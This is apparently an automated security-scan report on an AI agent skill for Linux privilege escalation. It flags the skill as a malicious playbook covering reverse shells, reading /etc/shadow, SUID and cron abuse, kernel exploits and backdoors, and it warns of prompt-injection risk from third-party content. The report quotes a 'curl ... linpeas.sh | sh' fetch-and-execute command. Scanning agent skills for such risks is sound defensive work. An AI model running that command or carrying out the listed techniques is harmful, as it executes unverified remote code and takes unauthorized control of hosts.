Linux Privilege Escalation

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The content is explicitly a step-by-step malicious playbook for gaining unauthorized root access — it contains reverse-shells, remote payload hosting, credential theft (reading /etc/shadow and offline cracking), SUID/cron/NFS abuse, kernel exploit instructions, and persistence/backdoor techniques, all of which enable remote code execution, data exfiltration, and backdoor installation.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's Phase 2: Automated Enumeration explicitly instructs fetching and executing public scripts (e.g., curl -L https://github.com/carlospolop/PEASS-ng/.../linpeas.sh | sh) and its Key Resources point to public, user-maintained sites like GTFOBins and GitHub, meaning the agent would ingest and act on untrusted third-party content.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs running a runtime fetch-and-execute command (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh) which downloads remote code and executes it as part of the recommended/required enumeration steps, so this external URL directly causes remote code execution.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to locate and exploit privilege escalation vectors (kernel exploits, sudo/SUID abuse, cron/PATH hijacks, reverse shells) to gain root access and alter the host system state.